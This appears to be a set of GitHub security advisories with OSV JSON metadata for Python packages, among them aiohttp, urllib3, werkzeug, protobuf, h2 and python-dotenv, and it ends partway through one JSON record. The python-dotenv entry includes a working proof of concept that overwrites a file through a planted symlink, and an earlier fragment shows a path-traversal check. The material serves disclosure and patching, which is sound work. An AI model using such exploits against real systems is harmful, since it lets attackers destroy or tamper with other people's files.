SUCCESSFUL - Path traversal vulnerability confirmed! \n\n[*] Cleaning up: /tmp/zipslip_test_tnu3qpd5\n```\n\n### Impact\n\n- Arbitrary file creation in filesystem (HIGH exploitability) - especially if popular packages download tar files remotely and use this package to extract files.\n- Privesc (LOW exploitability)\n- Supply-Chain attack (VARIABLE exploitability) - relevant to the first point.\n\n### Remediation\n\nI guess removing the custom filter is not feasible given the backward compatibility issues that might come up you can use a safer filter `strip_first_component` that skips or sanitizes `../` character sequences since it is already there eg.\n```\nif member.name.startswith(\u0027/\u0027) or \u0027..\u0027 in member.name:\n raise ValueError(f\\\"Attempted path traversal detected: {member.name}\\\")\n```",
"id": "GHSA-58pv-8j8x-9vj2",
"modified": "2026-01-22T22:25:55Z",
"published": "2026-01-13T21:48:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jaraco/jaraco.context/security/advisories/GHSA-58pv-8j8x-9vj2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23949"
},
{
"type": "WEB",
"url": "https://github.com/jaraco/jaraco.context/commit/7b26a42b525735e4085d2e994e13802ea339d5f9"
},
{
"type": "PACKAGE",
"url": "https://github.com/jaraco/jaraco.context"
},
{
"type": "WEB",
"url": "https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91"
},
{
"type": "WEB",
"url": "https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "jaraco.context Has a Path Traversal Vulnerability"
}
GHSA-966J-VMVW-G2G9
Vulnerability from github – Published: 2026-04-01 21:47 – Updated: 2026-04-24 20:33Summary
When following redirects to a different origin, aiohttp drops the Authorization header, but retains the Cookie and Proxy-Authorization headers.
Impact
The Cookie and Proxy-Authorizations headers could contain sensitive information which may be leaked to an unintended party after following a redirect.
Patch: https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34518"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:47:46Z",
"nvd_published_at": "2026-04-01T21:17:00Z",
"severity": "LOW"
},
"details": "### Summary\n\nWhen following redirects to a different origin, aiohttp drops the Authorization header, but retains the Cookie and Proxy-Authorization headers.\n\n### Impact\n\nThe Cookie and Proxy-Authorizations headers could contain sensitive information which may be leaked to an unintended party after following a redirect.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6",
"id": "GHSA-966j-vmvw-g2g9",
"modified": "2026-04-24T20:33:18Z",
"published": "2026-04-01T21:47:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-966j-vmvw-g2g9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34518"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP leaks Cookie and Proxy-Authorization headers on cross-origin redirect"
}
GHSA-8QVM-5X2C-J2W7
Vulnerability from github – Published: 2025-06-16 16:02 – Updated: 2025-06-16 16:02Summary
Any project that uses Protobuf pure-Python backend to parse untrusted Protocol Buffers data containing an arbitrary number of recursive groups, recursive messages or a series of SGROUP tags can be corrupted by exceeding the Python recursion limit.
Reporter: Alexis Challande, Trail of Bits Ecosystem Security Team ecosystem@trailofbits.com
Affected versions: This issue only affects the pure-Python implementation of protobuf-python backend. This is the implementation when PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=python environment variable is set or the default when protobuf is used from Bazel or pure-Python PyPi wheels. CPython PyPi wheels do not use pure-Python by default.
This is a Python variant of a previous issue affecting protobuf-java.
Severity
This is a potential Denial of Service. Parsing nested protobuf data creates unbounded recursions that can be abused by an attacker.
Proof of Concept
For reproduction details, please refer to the unit tests decoder_test.py and message_test
Remediation and Mitigation
A mitigation is available now. Please update to the latest available versions of the following packages: * protobuf-python(4.25.8, 5.29.5, 6.31.1)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "protobuf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.25.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "protobuf"
},
"ranges": [
{
"events": [
{
"introduced": "5.26.0rc1"
},
{
"fixed": "5.29.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "protobuf"
},
"ranges": [
{
"events": [
{
"introduced": "6.30.0rc1"
},
{
"fixed": "6.31.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-4565"
],
"database_specific": {
"cwe_ids": [
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-16T16:02:58Z",
"nvd_published_at": "2025-06-16T15:15:24Z",
"severity": "HIGH"
},
"details": "### Summary\nAny project that uses Protobuf pure-Python backend to parse untrusted Protocol Buffers data containing an arbitrary number of **recursive groups**, **recursive messages** or **a series of [`SGROUP`](https://protobuf.dev/programming-guides/encoding/#groups) tags** can be corrupted by exceeding the Python recursion limit.\n\nReporter: Alexis Challande, Trail of Bits Ecosystem Security Team\n[ecosystem@trailofbits.com](mailto:ecosystem@trailofbits.com)\n\nAffected versions: This issue only affects the [pure-Python implementation](https://github.com/protocolbuffers/protobuf/tree/main/python#implementation-backends) of protobuf-python backend. This is the implementation when `PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION=python` environment variable is set or the default when protobuf is used from Bazel or pure-Python PyPi wheels. CPython PyPi wheels do not use pure-Python by default.\n\nThis is a Python variant of a [previous issue affecting protobuf-java](https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-735f-pc8j-v9w8).\n\n### Severity\nThis is a potential Denial of Service. Parsing nested protobuf data creates unbounded recursions that can be abused by an attacker.\n\n### Proof of Concept\nFor reproduction details, please refer to the unit tests [decoder_test.py](https://github.com/protocolbuffers/protobuf/blob/main/python/google/protobuf/internal/decoder_test.py#L87-L98) and [message_test](https://github.com/protocolbuffers/protobuf/blob/main/python/google/protobuf/internal/message_test.py#L1436-L1478)\n\n### Remediation and Mitigation\nA mitigation is available now. Please update to the latest available versions of the following packages:\n* protobuf-python(4.25.8, 5.29.5, 6.31.1)",
"id": "GHSA-8qvm-5x2c-j2w7",
"modified": "2025-06-16T16:02:58Z",
"published": "2025-06-16T16:02:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-735f-pc8j-v9w8"
},
{
"type": "WEB",
"url": "https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-8qvm-5x2c-j2w7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4565"
},
{
"type": "WEB",
"url": "https://github.com/protocolbuffers/protobuf/commit/17838beda2943d08b8a9d4df5b68f5f04f26d901"
},
{
"type": "PACKAGE",
"url": "https://github.com/protocolbuffers/protobuf"
},
{
"type": "WEB",
"url": "https://github.com/protocolbuffers/protobuf/blob/main/python/google/protobuf/internal/decoder_test.py#L87-L98"
},
{
"type": "WEB",
"url": "https://github.com/protocolbuffers/protobuf/blob/main/python/google/protobuf/internal/message_test.py#L1436-L1478"
},
{
"type": "WEB",
"url": "https://github.com/protocolbuffers/protobuf/tree/main/python#implementation-backends"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "protobuf-python has a potential Denial of Service issue"
}
GHSA-R244-WG5G-6W2R
Vulnerability from github – Published: 2025-05-28 14:57 – Updated: 2025-10-14 21:59Summary
Amazon Redshift Python Connector is a pure Python connector to Redshift (i.e., driver) that implements the Python Database API Specification 2.0.
When the Amazon Redshift Python Connector is configured with the BrowserAzureOAuth2CredentialsProvider plugin, the driver skips the SSL certificate validation step for the Identity Provider.
Impact
An insecure connection could allow an actor to intercept the token exchange process and retrieve an access token.
Impacted versions: >=2.0.872;<=2.1.6
Patches
Upgrade Amazon Redshift Python Connector to version 2.1.7 and ensure any forked or derivative code is patched to incorporate the new fixes.
Workarounds
None
References
If you have any questions or comments about this advisory we ask that you contact AWS/Amazon Security via our vulnerability reporting page [1] or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.
[1] Vulnerability reporting page: https://aws.amazon.com/security/vulnerability-reporting
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.1.6"
},
"package": {
"ecosystem": "PyPI",
"name": "redshift-connector"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.872"
},
{
"fixed": "2.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-5279"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-28T14:57:31Z",
"nvd_published_at": "2025-05-27T21:15:23Z",
"severity": "HIGH"
},
"details": "### Summary\n[Amazon Redshift Python Connector](https://docs.aws.amazon.com/redshift/latest/mgmt/python-redshift-driver.html) is a pure Python connector to Redshift (i.e., driver) that implements the [Python Database API Specification 2.0](https://www.python.org/dev/peps/pep-0249/).\n\nWhen the Amazon Redshift Python Connector is configured with the BrowserAzureOAuth2CredentialsProvider plugin, the driver skips the SSL certificate validation step for the Identity Provider. \n\n### Impact\n\nAn insecure connection could allow an actor to intercept the token exchange process and retrieve an access token.\n\n**Impacted versions:** \u003e=2.0.872;\u003c=2.1.6\n\n### Patches\n\nUpgrade Amazon Redshift Python Connector to version 2.1.7 and ensure any forked or derivative code is patched to incorporate the new fixes.\n\n### Workarounds\n\nNone\n\n### References\n\nIf you have any questions or comments about this advisory we ask that you contact AWS/Amazon Security via our vulnerability reporting page [1] or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.\n\n[1] Vulnerability reporting page: https://aws.amazon.com/security/vulnerability-reporting",
"id": "GHSA-r244-wg5g-6w2r",
"modified": "2025-10-14T21:59:21Z",
"published": "2025-05-28T14:57:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aws/amazon-redshift-python-driver/security/advisories/GHSA-r244-wg5g-6w2r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5279"
},
{
"type": "WEB",
"url": "https://aws.amazon.com/security/security-bulletins"
},
{
"type": "WEB",
"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-011"
},
{
"type": "PACKAGE",
"url": "https://github.com/aws/amazon-redshift-python-driver"
},
{
"type": "WEB",
"url": "https://github.com/aws/amazon-redshift-python-driver/releases/tag/v2.1.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Issue with Amazon Redshift Python Connector and the BrowserAzureOAuth2CredentialsProvider plugin"
}
GHSA-847F-9342-265H
Vulnerability from github – Published: 2025-08-25 20:44 – Updated: 2025-11-03 21:34Summary
HTTP/2 request splitting vulnerability allows attackers to perform request smuggling attacks by injecting CRLF characters into headers. This occurs when servers downgrade HTTP/2 requests to HTTP/1.1 without properly validating header names/values, enabling attackers to manipulate request boundaries and bypass security controls.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "h2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-57804"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-25T20:44:43Z",
"nvd_published_at": "2025-08-25T21:15:37Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nHTTP/2 request splitting vulnerability allows attackers to perform request smuggling attacks by injecting CRLF characters into headers. This occurs when servers downgrade HTTP/2 requests to HTTP/1.1 without properly validating header names/values, enabling attackers to manipulate request boundaries and bypass security controls.",
"id": "GHSA-847f-9342-265h",
"modified": "2025-11-03T21:34:24Z",
"published": "2025-08-25T20:44:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/python-hyper/h2/security/advisories/GHSA-847f-9342-265h"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57804"
},
{
"type": "WEB",
"url": "https://github.com/python-hyper/h2/commit/035e9899f95e3709af098f578bfc3cd302298e3a"
},
{
"type": "PACKAGE",
"url": "https://github.com/python-hyper/h2"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00004.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "h2 allows HTTP Request Smuggling due to illegal characters in headers"
}
GHSA-6MQ8-RVHQ-8WGG
Vulnerability from github – Published: 2026-01-05 22:58 – Updated: 2026-01-06 16:06Summary
A zip bomb can be used to execute a DoS against the aiohttp server.
Impact
An attacker may be able to send a compressed request that when decompressed by aiohttp could exhaust the host's memory.
Patch: https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.2"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-69223"
],
"database_specific": {
"cwe_ids": [
"CWE-409",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-05T22:58:41Z",
"nvd_published_at": "2026-01-05T22:15:53Z",
"severity": "HIGH"
},
"details": "### Summary\nA zip bomb can be used to execute a DoS against the aiohttp server.\n\n### Impact\nAn attacker may be able to send a compressed request that when decompressed by aiohttp could exhaust the host\u0027s memory.\n\n------\n\nPatch: https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a",
"id": "GHSA-6mq8-rvhq-8wgg",
"modified": "2026-01-06T16:06:18Z",
"published": "2026-01-05T22:58:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69223"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "AIOHTTP\u0027s HTTP Parser auto_decompress feature is vulnerable to zip bomb"
}
GHSA-P8Q5-CVWX-WVWP
Vulnerability from github – Published: 2025-03-03 15:26 – Updated: 2025-04-09 20:01Impact
User enumeration in database authentication in Flask-AppBuilder <= 4.5.3 and werkzeug >= 3.0.0. Allows for a non authenticated user to enumerate existing usernames by timing the response time from the server when brute forcing requests to login.
Patches
Upgrade to flask-appbuilder>=4.5.3
Workarounds
Downgrade werkzeug to <3.0.0
References
Are there any links users can visit to find out more?
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "flask-appbuilder"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-24023"
],
"database_specific": {
"cwe_ids": [
"CWE-204"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-03T15:26:03Z",
"nvd_published_at": "2025-03-03T16:15:41Z",
"severity": "LOW"
},
"details": "### Impact\nUser enumeration in database authentication in Flask-AppBuilder \u003c= 4.5.3 and werkzeug \u003e= 3.0.0. Allows for a non authenticated user to enumerate existing usernames by timing the response time from the server when brute forcing requests to login.\n\n### Patches\n\nUpgrade to flask-appbuilder\u003e=4.5.3\n\n### Workarounds\nDowngrade werkzeug to \u003c3.0.0\n\n### References\n_Are there any links users can visit to find out more?_",
"id": "GHSA-p8q5-cvwx-wvwp",
"modified": "2025-04-09T20:01:40Z",
"published": "2025-03-03T15:26:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-p8q5-cvwx-wvwp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24023"
},
{
"type": "PACKAGE",
"url": "https://github.com/dpgaspar/Flask-AppBuilder"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/flask-appbuilder/PYSEC-2025-15.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Flask-AppBuilder Observable Response Discrepancy"
}
GHSA-HGF8-39GV-G3F2
Vulnerability from github – Published: 2025-12-02 00:27 – Updated: 2025-12-02 00:27Werkzeug's safe_join function allows path segments with Windows device names. On Windows, there are special device names such as CON, AUX, etc that are implicitly present and readable in every directory. send_from_directory uses safe_join to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "werkzeug"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66221"
],
"database_specific": {
"cwe_ids": [
"CWE-67"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-02T00:27:38Z",
"nvd_published_at": "2025-11-29T03:16:00Z",
"severity": "MODERATE"
},
"details": "Werkzeug\u0027s `safe_join` function allows path segments with Windows device names. On Windows, there are special device names such as `CON`, `AUX`, etc that are implicitly present and readable in every directory. `send_from_directory` uses `safe_join` to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely.",
"id": "GHSA-hgf8-39gv-g3f2",
"modified": "2025-12-02T00:27:38Z",
"published": "2025-12-02T00:27:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-hgf8-39gv-g3f2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66221"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/4b833376a45c323a189cd11d2362bcffdb1c0c13"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/werkzeug"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/releases/tag/3.1.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Werkzeug safe_join() allows Windows special device names"
}
GHSA-GM62-XV2J-4W53
Vulnerability from github – Published: 2025-12-05 18:15 – Updated: 2025-12-05 18:32Impact
urllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., Content-Encoding: gzip, zstd).
However, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data.
Affected usages
Applications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly.
Remediation
Upgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5.
If upgrading is not immediately possible, use preload_content=False and ensure that resp.headers["content-encoding"] contains a safe number of encodings before reading the response content.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "urllib3"
},
"ranges": [
{
"events": [
{
"introduced": "1.24"
},
{
"fixed": "2.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66418"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-05T18:15:19Z",
"nvd_published_at": "2025-12-05T16:15:51Z",
"severity": "HIGH"
},
"details": "## Impact\n\nurllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`).\n\nHowever, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data.\n\n\n## Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly.\n\n\n## Remediation\n\nUpgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5.\n\nIf upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers[\"content-encoding\"]` contains a safe number of encodings before reading the response content.",
"id": "GHSA-gm62-xv2j-4w53",
"modified": "2025-12-05T18:32:59Z",
"published": "2025-12-05T18:15:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66418"
},
{
"type": "WEB",
"url": "https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8"
},
{
"type": "PACKAGE",
"url": "https://github.com/urllib3/urllib3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H",
"type": "CVSS_V4"
}
],
"summary": "urllib3 allows an unbounded number of links in the decompression chain"
}
GHSA-MWH4-6H8G-PG8W
Vulnerability from github – Published: 2026-04-01 21:48 – Updated: 2026-04-01 21:48Summary
An attacker who controls the reason parameter when creating a Response may be able to inject extra headers or similar exploits.
Impact
In the unlikely situation that an application allows untrusted data to be used in the response's reason parameter, then an attacker could manipulate the response to send something different from what the developer intended.
Patch: https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34519"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:48:24Z",
"nvd_published_at": "2026-04-01T21:17:00Z",
"severity": "LOW"
},
"details": "### Summary\n\nAn attacker who controls the `reason` parameter when creating a `Response` may be able to inject extra headers or similar exploits.\n\n### Impact\n\nIn the unlikely situation that an application allows untrusted data to be used in the response\u0027s `reason` parameter, then an attacker could manipulate the response to send something different from what the developer intended.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b",
"id": "GHSA-mwh4-6h8g-pg8w",
"modified": "2026-04-01T21:48:24Z",
"published": "2026-04-01T21:48:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mwh4-6h8g-pg8w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34519"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP has HTTP response splitting via \\r in reason phrase"
}
GHSA-MF9W-MJ56-HR94
Vulnerability from github – Published: 2026-04-21 14:38 – Updated: 2026-04-21 14:38Summary
set_key() and unset_key() in python-dotenv follow symbolic links when rewriting .env files, allowing a local attacker to overwrite arbitrary files via a crafted symlink when a cross-device rename fallback is triggered.
Details
The rewrite() context manager in dotenv/main.py is used by both set_key() and unset_key() to safely modify .env files. It works by writing to a temporary file (created in the system's default temp directory, typically /tmp) and then using shutil.move() to replace the original file.
When the .env path is a symbolic link and the temp directory resides on a different filesystem than the target (a common configuration on Linux systems using tmpfs for /tmp), the following sequence occurs:
shutil.move()first attemptsos.rename(), which fails with anOSErrorbecause atomic renames cannot cross device boundaries.- On failure,
shutil.move()falls back toshutil.copy2()followed byos.unlink(). shutil.copy2()callsshutil.copyfile()withfollow_symlinks=Trueby default.- This causes the content to be written to the symlink target rather than replacing the symlink itself.
An attacker who has write access to the directory containing a .env file can pre-place a symlink pointing to any file that the application process has write access to. When the application (or a privileged process such as a deploy script, Docker entrypoint, or CI pipeline) calls set_key() or unset_key(), the symlink target is overwritten with the new .env content.
This vulnerability does not require a race condition and is fully deterministic once the preconditions are met.
Impact
The primary impacts are to integrity and availability:
- File overwrite / destruction (DoS): An attacker can cause an application or privileged process to corrupt or destroy configuration files, database configs, or other sensitive files it would not normally have access to modify.
- Integrity violation: The target file's original content is replaced with
.env-formatted content controlled by the attacker. - Potential privilege escalation: In scenarios where a privileged process (running as root or a service account) calls
set_key(), the attacker can leverage this to write to files beyond their own access level.
The scope of impact depends on the application using python-dotenv and the privileges under which it runs.
Proof of Concept
The following script demonstrates the vulnerability. It requires /tmp and the user's home directory to reside on different devices (common on systemd-based Linux systems with tmpfs).
import os
import sys
import tempfile
from dotenv import set_key
# Pre-condition: /tmp must be on a different device than the target directory.
tmp_dev = os.stat("/tmp").st_dev
home_dev = os.stat(os.path.expanduser("~")).st_dev
assert tmp_dev != home_dev, "Skipped: /tmp and ~ are on the same device (no cross-device move)"
with tempfile.TemporaryDirectory(dir=os.path.expanduser("~")) as workdir:
# File an attacker wants to overwrite
target = os.path.join(workdir, "victim_config.txt")
with open(target, "w") as f:
f.write("DB_PASSWORD=supersecret\n")
# Attacker pre-places a symlink at the path the application will use as .env
env_symlink = os.path.join(workdir, ".env")
os.symlink(target, env_symlink)
before = open(target).read()
# Application writes a new key -- triggers the cross-device fallback
set_key(env_symlink, "INJECTED", "attacker_value")
after = open(target).read()
print("Before:", repr(before))
print("After: ", repr(after))
print("Symlink target overwritten:", target)
Expected output:
Before: 'DB_PASSWORD=supersecret\n'
After: "DB_PASSWORD=supersecret\nINJECTED='attacker_value'\n"
Symlink target overwritten: /home/user/tmp806nut2g/victim_config.txt
Remediation
The fix changes the rewrite() context manager in the following ways:
- Symlinks are no longer followed by default. When the
.envpath is a symlink,rewrite()now resolves it to the real path before proceeding, or (by default) operates on the symlink entry itself rather than the target. - A
follow_symlinks: bool = Falseparameter is added toset_key()andunset_key()for users who explicitly need the old behavior. - Temp files are written in the same directory as the target
.envfile (instead of the system temp directory), eliminating the cross-device rename condition entirely. os.replace()is used instead ofshutil.move(), providing atomic replacement without symlink-following fallback behavior.
Users are advised to upgrade to the patched version as soon as it is available on PyPI.
Timeline
| Date | Event |
|---|---|
| 2026-01-09 | Initial report received from Giorgos Tsigourakos regarding a separate, unrelated issue also located in rewrite() |
| 2026-01-10 | Co-maintainer acknowledged report, requested clarification |
| 2026-01-11 | Initial report assessed as not exploitable and closed |
| 2026-02-24 | Reporter identified new, distinct cross-device symlink attack vector with deterministic exploitation |
| 2026-02-26 | Co-maintainer confirmed vulnerability and shared draft patch |
| 2026-02-26 | Reporter validated fix with monkeypatched PoC, proposed CVSS |
| 2026-03-01 | Patch merged to main |
| 2026-03-01 | Patched version released to PyPI |
| 2026-04-20 | Advisory published |
Patches
Upgrade to v.1.2.2 or use the patch from https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "python-dotenv"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.2"
}
